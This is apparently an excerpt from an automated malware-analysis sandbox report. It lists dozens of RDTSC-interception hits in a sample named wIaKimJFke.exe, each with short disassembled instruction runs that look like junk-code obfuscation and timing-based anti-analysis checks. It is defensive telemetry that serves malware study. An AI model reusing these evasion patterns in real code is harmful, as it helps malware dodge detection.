Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75299C second address: 7529A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752C69 second address: 752C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752C76 second address: 752C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752C80 second address: 752C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FED75508866h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752C8F second address: 752C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752DCB second address: 752DD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752DD1 second address: 752DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752DD7 second address: 752DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752DDD second address: 752DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752DE1 second address: 752E02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007FED75508878h 0x00000014 push esi 0x00000015 jmp 00007FED7550886Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FA470 second address: 6FA475 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FA475 second address: 6FA502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D3900h] 0x0000000e mov ebx, dword ptr [ebp+12481454h] 0x00000014 or edx, 4FA532EDh 0x0000001a add eax, ebx 0x0000001c add dword ptr [ebp+122D184Fh], esi 0x00000022 jc 00007FED7550886Ch 0x00000028 push eax 0x00000029 jmp 00007FED7550886Eh 0x0000002e mov dword ptr [esp], eax 0x00000031 mov dword ptr [ebp+122D1820h], edi 0x00000037 push 00000004h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FED75508868h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 sub dword ptr [ebp+122D184Fh], eax 0x00000059 call 00007FED7550886Fh 0x0000005e mov edi, dword ptr [ebp+122D3928h] 0x00000064 pop edi 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push edx 0x0000006a pop edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FA502 second address: 6FA510 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752F93 second address: 752F9D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED75508866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752F9D second address: 752FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752FA3 second address: 752FA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752FA8 second address: 752FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 753B55 second address: 753B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 753B67 second address: 753B75 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7595BB second address: 7595C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75987C second address: 759897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FED74F3E525h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FED74F3E51Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 759EA2 second address: 759EC9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED7550886Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FED75508875h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75A74A second address: 75A76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FED74F3E516h 0x0000000a jmp 00007FED74F3E529h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75AA35 second address: 75AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75AA3D second address: 75AA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FED74F3E516h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75AA4D second address: 75AA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75AA51 second address: 75AA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FED74F3E529h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75AF84 second address: 75AF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75AF88 second address: 75AF8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75AF8C second address: 75AFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FED75508866h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 761012 second address: 761016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 761016 second address: 76101B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 764F61 second address: 764F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 764F65 second address: 764F6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7645CC second address: 7645E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7645E3 second address: 7645ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7645ED second address: 7645FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED74F3E516h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7645FB second address: 764601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76C14F second address: 76C1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FED74F3E516h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FED74F3E528h 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FED74F3E516h 0x00000019 popad 0x0000001a jmp 00007FED74F3E523h 0x0000001f popad 0x00000020 pushad 0x00000021 jns 00007FED74F3E51Ah 0x00000027 push ebx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ebx 0x0000002b push edx 0x0000002c jmp 00007FED74F3E51Fh 0x00000031 pop edx 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76C705 second address: 76C725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FED75508866h 0x00000011 jne 00007FED75508866h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76C725 second address: 76C73A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76CB89 second address: 76CB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76CB8F second address: 76CBB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FED74F3E516h 0x00000009 jl 00007FED74F3E516h 0x0000000f jmp 00007FED74F3E51Fh 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76D2C9 second address: 76D2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76D971 second address: 76D977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76D977 second address: 76D991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FED7550886Bh 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76D991 second address: 76D9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E529h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76D9AE second address: 76D9D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FED75508866h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FED75508874h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76B8F9 second address: 76B91A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FED74F3E516h 0x00000010 pop eax 0x00000011 popad 0x00000012 push ebx 0x00000013 ja 00007FED74F3E51Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 76B91A second address: 76B935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FED75508870h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 774059 second address: 774070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E523h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 773AAF second address: 773AB9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FED75508866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 773D43 second address: 773D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 773D60 second address: 773D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 773D66 second address: 773D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 773D6B second address: 773D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 77F899 second address: 77F8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 ja 00007FED74F3E516h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 77FA05 second address: 77FA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 77FA0B second address: 77FA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 77FA11 second address: 77FA16 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 77FA16 second address: 77FA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 77FA23 second address: 77FA29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 77FA29 second address: 77FA34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 782171 second address: 782177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 78229B second address: 7822A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 793A55 second address: 793A5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 793A5E second address: 793A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FED74F3E51Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 797398 second address: 7973A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FED75508866h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7973A4 second address: 7973A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 797220 second address: 79723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508879h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 79A8A4 second address: 79A8AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7A125E second address: 7A1264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7A1264 second address: 7A1271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FED74F3E51Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7A1271 second address: 7A1278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7A034A second address: 7A0350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7A0350 second address: 7A0381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED7550886Fh 0x0000000b pushad 0x0000000c jmp 00007FED75508879h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7A2AD2 second address: 7A2B3A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E51Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007FED74F3E516h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FED74F3E520h 0x0000001f pop esi 0x00000020 jne 00007FED74F3E535h 0x00000026 jmp 00007FED74F3E51Dh 0x0000002b push esi 0x0000002c push edx 0x0000002d pop edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7C319C second address: 7C31CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508878h 0x0000000b jmp 00007FED75508870h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7C31CD second address: 7C31DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jnl 00007FED74F3E516h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7C31DD second address: 7C31E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7C5977 second address: 7C597B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7C597B second address: 7C5999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508878h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7C5999 second address: 7C59B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7C59B0 second address: 7C59B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7DDB67 second address: 7DDB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jo 00007FED74F3E516h 0x0000000e pop ebx 0x0000000f popad 0x00000010 push ecx 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7DDE23 second address: 7DDE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FED75508866h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7DDE2F second address: 7DDE33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7DE431 second address: 7DE435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7DE6F8 second address: 7DE70C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnp 00007FED74F3E516h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7DE8AF second address: 7DE8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7DE8B5 second address: 7DE8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 jmp 00007FED74F3E51Fh 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7E1602 second address: 7E1609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
